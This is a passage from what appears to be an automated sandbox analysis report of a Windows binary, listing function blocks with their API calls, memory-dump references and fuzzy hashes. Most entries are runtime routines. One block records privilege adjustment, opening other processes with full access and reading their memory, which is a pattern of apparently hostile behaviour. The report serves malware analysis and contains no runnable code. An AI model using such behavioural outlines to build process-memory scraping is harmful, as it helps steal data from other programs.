• Opcode Fuzzy Hash: 6d4a41673fa17df86b8299c9f0ccbcd06cef983d673ba703b964ea58f67c7482
• Instruction Fuzzy Hash: 7E010CF1506340ABE710EB65C849AEF33E4AFC6358F45092DE55486180EF749908CED6
APIs
• lstrlenA.KERNEL32(?,?,?), ref: 6A6F5847
• _memset.LIBCMT ref: 6A6F5864
• GetWindowTextA.USER32(00000000,00000000,00000100), ref: 6A6F587E
• lstrcmpA.KERNEL32(00000000,?,?,?), ref: 6A6F5890
• SetWindowTextA.USER32(00000000,?), ref: 6A6F589C
  • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
  • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
• String ID:
• API String ID: 4273134663-0
• Opcode ID: 7cbf79e6bfbc7b732ac778f08a1626d98b5529e9d03c95299f61dbd381098f71
• Instruction ID: 33afa3843a6697c9fab4641b182c4ea3cc9247c4349cca53990da1abc13fc284
• Opcode Fuzzy Hash: 7cbf79e6bfbc7b732ac778f08a1626d98b5529e9d03c95299f61dbd381098f71
• Instruction Fuzzy Hash: 4B0100B2600224ABCB109AA5CC89FCF37EDAB59744F0000B1FA06D3140DF74DE458BA0
APIs
• GetThreadLocale.KERNEL32(?,00000000,0BE9E867,?,?,00000000), ref: 0BE9E7E8
  • Part of subcall function 0BE9E548: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,0BE9E867,?,?,00000000), ref: 0BE9E818
• EnumCalendarInfoA.KERNEL32(Function_0000E71C,00000000,00000000,00000004), ref: 0BE9E823
• GetThreadLocale.KERNEL32(00000000,00000003,Function_0000E71C,00000000,00000000,00000004,00000000,0BE9E867,?,?,00000000), ref: 0BE9E841
• EnumCalendarInfoA.KERNEL32(0BE9E758,00000000,00000000,00000003), ref: 0BE9E84C
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                  • String ID:
                                                                                  • API String ID: 4102113445-0
                                                                                  • Opcode ID: 9377363e1906e492291253e9ee53dba17901c267e5de1429523a379cf6de6243
                                                                                  • Instruction ID: 000e1ec94b11a8390c744158435b642e2c6349d4050443510f6d29b24dec53ab
                                                                                  • Opcode Fuzzy Hash: 9377363e1906e492291253e9ee53dba17901c267e5de1429523a379cf6de6243
                                                                                  • Instruction Fuzzy Hash: 4C01F2306002047FEF21E6B4BC13B6E3698DB46B10F506670FA00E6AC0EA649E0D82B5
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 6A704CE7
                                                                                    • Part of subcall function 6A705883: __getptd_noexit.LIBCMT ref: 6A705886
                                                                                    • Part of subcall function 6A705883: __amsg_exit.LIBCMT ref: 6A705893
                                                                                  • __amsg_exit.LIBCMT ref: 6A704D07
                                                                                  • __lock.LIBCMT ref: 6A704D17
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 6A704D34
                                                                                  • InterlockedIncrement.KERNEL32(0D081668), ref: 6A704D5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: 8cd6622d127518ff257a369637cf18022b2f74c8b2001448c2236e5589ae208b
                                                                                  • Instruction ID: 695b5dc57d7fdc50162a5df5670326088bf71281f49b98e163c77265cc86cc17
                                                                                  • Opcode Fuzzy Hash: 8cd6622d127518ff257a369637cf18022b2f74c8b2001448c2236e5589ae208b
                                                                                  • Instruction Fuzzy Hash: 3F01D6B1940B11ABDB109B65D60CB4DBBF0EF96B28F020065E914A7281CF34AE49DFD1
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A705EED: __mtinitlocknum.LIBCMT ref: 6A705F03
                                                                                    • Part of subcall function 6A705EED: __amsg_exit.LIBCMT ref: 6A705F0F
                                                                                    • Part of subcall function 6A705EED: EnterCriticalSection.KERNEL32(?,?,?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001), ref: 6A705F17
                                                                                  • ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                  • ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                  • HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                  • GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: 917cf93f3137ea90bd2c7512ae871064841a17f99c77c558542c187d3f8391cc
                                                                                  • Instruction ID: c60480b4457d7d83bc2d5de0baf7ba8cfb6fa6a91c3a271f90d03934b0393b2a
                                                                                  • Opcode Fuzzy Hash: 917cf93f3137ea90bd2c7512ae871064841a17f99c77c558542c187d3f8391cc
                                                                                  • Instruction Fuzzy Hash: 2601D671A46311AAEF205BB1DE0DB4E7FF59F03728F124419E410A7080EF38DA498A54
                                                                                  APIs
                                                                                  • TlsFree.KERNEL32(?,?,?,6A6F40E6), ref: 6A6F40A8
                                                                                  • GlobalHandle.KERNEL32(?), ref: 6A6F40B6
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6A6F40BF
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6A6F40C6
                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,6A6F40E6), ref: 6A6F40D0
                                                                                    • Part of subcall function 6A6F3ECA: EnterCriticalSection.KERNEL32(6A72CFE8,?,6A72CFCC,6A72CFE8,6A72CFCC,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000), ref: 6A6F3F29
                                                                                    • Part of subcall function 6A6F3ECA: LeaveCriticalSection.KERNEL32(6A72CFE8,00000000,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047), ref: 6A6F3F39
                                                                                    • Part of subcall function 6A6F3ECA: LocalFree.KERNEL32(?,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047,?), ref: 6A6F3F42
                                                                                    • Part of subcall function 6A6F3ECA: TlsSetValue.KERNEL32(6A72CFCC,00000000,?,6A6F3FA9,00000000,00000000,?,?,?,?,6A6F02CE,00000000,00000000,000000FF,00000010,6A6EE047), ref: 6A6F3F54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                  • String ID:
                                                                                  • API String ID: 1549993015-0
                                                                                  • Opcode ID: 200b89e0b381af869f3231e386db655f8e4c551a08ff4985dc9ce113d49312d7
                                                                                  • Instruction ID: f616acbb12ae345fea66c1a804d9d357ab8f36eec6b90e0ad92c4c763a8c6156
                                                                                  • Opcode Fuzzy Hash: 200b89e0b381af869f3231e386db655f8e4c551a08ff4985dc9ce113d49312d7
                                                                                  • Instruction Fuzzy Hash: 9BF05E322002119BDB116FA9DD4CE2B36FAAFC666471A0A24F925D3281DF70DC079BA4
                                                                                  APIs
                                                                                    • Part of subcall function 6A6FE5E7: _doexit.LIBCMT ref: 6A6FE5F3
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 6A6FDCD5
                                                                                    • Part of subcall function 6A705695: TlsGetValue.KERNEL32(?,6A705821,?,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A70569E
                                                                                    • Part of subcall function 6A705695: __decode_pointer.LIBCMT ref: 6A7056B0
                                                                                    • Part of subcall function 6A705695: TlsSetValue.KERNEL32(00000000,?,6A6D65A5,?,00000104,6A71BAA0,?,6A6D101E), ref: 6A7056BF
                                                                                  • ___fls_getvalue@4.LIBCMT ref: 6A6FDCE0
                                                                                    • Part of subcall function 6A705675: TlsGetValue.KERNEL32(?,?,6A6FDCE5,00000000), ref: 6A705683
                                                                                  • ___fls_setvalue@8.LIBCMT ref: 6A6FDCF2
                                                                                    • Part of subcall function 6A7056C9: __decode_pointer.LIBCMT ref: 6A7056DA
                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 6A6FDCFB
                                                                                  • ExitThread.KERNEL32 ref: 6A6FDD02
                                                                                  • __freefls@4.LIBCMT ref: 6A6FDD1E
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6A6FDD31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 1537469427-0
                                                                                  • Opcode ID: ee36c20a79592796ab1ad16eb42480ae7887be91928c63acc8780ac256425564
                                                                                  • Instruction ID: 9786baab2c646c55acec5c0e6dd8eb350c66fd5d27ee655405539814dc88a851
                                                                                  • Opcode Fuzzy Hash: ee36c20a79592796ab1ad16eb42480ae7887be91928c63acc8780ac256425564
                                                                                  • Instruction Fuzzy Hash: 38E0ECB180020AAB8F003BF1DE1D96E7AEE5E5174DB168960FA16D3016EF28A8164A95
                                                                                  APIs
                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0BE9EA4A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0BE9E8AF
                                                                                    • Part of subcall function 0BE9E548: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$InfoThread
                                                                                  • String ID: eeee$ggg$yyyy
                                                                                  • API String ID: 4232894706-1253427255
                                                                                  • Opcode ID: aa42fe545bf88fe55df422e39f4362b8c2a9b1c36c3cdc89c2a9cd80b73241ac
                                                                                  • Instruction ID: 941e5a02245b63ede8308688cf3c15daab54af40fd9989152144b68a5dbe862b
                                                                                  • Opcode Fuzzy Hash: aa42fe545bf88fe55df422e39f4362b8c2a9b1c36c3cdc89c2a9cd80b73241ac
                                                                                  • Instruction Fuzzy Hash: 4D4127347041068FCF25EBB9F8922FEB3E6EF84140B183565D662D3364E6A0ED0E8261
                                                                                  APIs
                                                                                  Strings
                                                                                  • %X%s, xrefs: 6A6DAFB9
                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6A6DAF53
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memsetwsprintf
                                                                                  • String ID: %X%s$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
                                                                                  • API String ID: 1984265443-1468443404
                                                                                  • Opcode ID: a45950ed4d60a3b2c8a396de41871a8c7f88a131651859f93148c4ab17c14374
                                                                                  • Instruction ID: 353180ce6540c63e3781f139e26f0435108b0a4f7f5304b7c71a64c9844d633b
                                                                                  • Opcode Fuzzy Hash: a45950ed4d60a3b2c8a396de41871a8c7f88a131651859f93148c4ab17c14374
                                                                                  • Instruction Fuzzy Hash: 011148626083505FE31CFA28D915BBBBAD79BC6304F48883DFC899B295D92859084393
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D911F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D914D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
                                                                                  • String ID: (9k$U
                                                                                  • API String ID: 3726627124-349914351
                                                                                  • Opcode ID: 045ec8f332b4c9fd249bdb7c6587d69a2c71ad32a617f7b6af75d4e5df7f694f
                                                                                  • Instruction ID: 3e1efd261d3d4e048a8166d43b162f8802eb883a7e8ef5420c6cb018f07ad295
                                                                                  • Opcode Fuzzy Hash: 045ec8f332b4c9fd249bdb7c6587d69a2c71ad32a617f7b6af75d4e5df7f694f
                                                                                  • Instruction Fuzzy Hash: A411E131608381ABC701EB28CC09A5FBFE5AFDA254F054A5CF498C72A1D774C905CBAB
                                                                                  APIs
                                                                                    • Part of subcall function 6A6F418D: EnterCriticalSection.KERNEL32(6A72D1A0,?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41C7
                                                                                    • Part of subcall function 6A6F418D: InitializeCriticalSection.KERNEL32(?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41D9
                                                                                    • Part of subcall function 6A6F418D: LeaveCriticalSection.KERNEL32(6A72D1A0,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41E6
                                                                                    • Part of subcall function 6A6F418D: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,6A6F3A94,00000010,00000008,6A6F393F,6A6F38E2,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F41F6
                                                                                    • Part of subcall function 6A6F3A79: __EH_prolog3_catch.LIBCMT ref: 6A6F3A80
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 6A6F8F6C
                                                                                  • FreeLibrary.KERNEL32(?), ref: 6A6F8F7C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                  • String ID: HtmlHelpA$hhctrl.ocx
                                                                                  • API String ID: 2853499158-63838506
                                                                                  • Opcode ID: 6165336149ef1f0b76d048e35179ee409b16bd22e045e42d63cdd9f94cb54863
                                                                                  • Instruction ID: 133f17553355cf3764821e1e34734b75d420bd2fd675639cd43cd9f4dd7f0866
                                                                                  • Opcode Fuzzy Hash: 6165336149ef1f0b76d048e35179ee409b16bd22e045e42d63cdd9f94cb54863
                                                                                  • Instruction Fuzzy Hash: 1801FD3204A70AAFDB211FA3C90CB4B3AE7AF01B95F008D6AF55991460DF70D8528A26
                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBCMT ref: 6A70E153
                                                                                    • Part of subcall function 6A70E0AE: ___BuildCatchObjectHelper.LIBCMT ref: 6A70E0E4
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 6A70E16A
                                                                                  • ___FrameUnwindToState.LIBCMT ref: 6A70E178
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                  • String ID: csm
                                                                                  • API String ID: 2163707966-1018135373
                                                                                  • Opcode ID: 828603360b51eb85b92ad848efaa8f4f417f419bab23d6e14f156f2916d7a9f6
                                                                                  • Instruction ID: dae79872b6afa9f306b7443450e1562fad68e07ee69f66abfadbca9ff1f17eda
                                                                                  • Opcode Fuzzy Hash: 828603360b51eb85b92ad848efaa8f4f417f419bab23d6e14f156f2916d7a9f6
                                                                                  • Instruction Fuzzy Hash: B301F6B1001209BBDF125F51CE48EAB7FAAEF1A358F018021FD5815161DB3699B5DBA4
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,6A70392A), ref: 6A70F60F
                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6A70F61F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                  • API String ID: 1646373207-3105848591
